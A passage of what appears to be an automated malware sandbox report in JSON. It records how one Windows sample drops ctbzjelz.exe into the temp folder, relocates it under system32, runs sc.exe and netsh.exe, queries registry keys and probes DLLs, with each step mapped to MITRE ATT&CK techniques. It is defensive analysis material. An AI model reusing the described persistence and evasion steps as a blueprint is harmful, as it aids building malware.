\"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ctbzjelz.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ctbzjelz.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" was detected as \"VC8 -> Microsoft Corporation\"\n \"ctbzjelz.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00001588]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"ctbzjelz.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" reads file \"c:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe.Local\\\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\D510AF41349A55E3D3C3233ACB0540C72492301D3FC360D6AA7C47E1037CD2C2.EXE.LOCAL\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\ctbzjelz.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00001588]\n \"CTBZJELZ.EXE.67B73BF7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ctbzjelz.exe.67B73BF6.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ctbzjelz.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ctbzjelz.exe]- [targetUID: 00000000-00001588]\n \"CTBZJELZ.EXE.67B73BF7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ctbzjelz.exe.67B73BF6.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\" to \"%WINDIR%\\system32\\aweovprv\\ctbzjelz.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"svchost.exe\" queried SystemProcessInformation at 00000000-00003044-00000105-66637 [PID: 3044]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003044-00000105-1353736 [PID: 3044]\n \"netsh.exe\" queried SystemProcessInformation 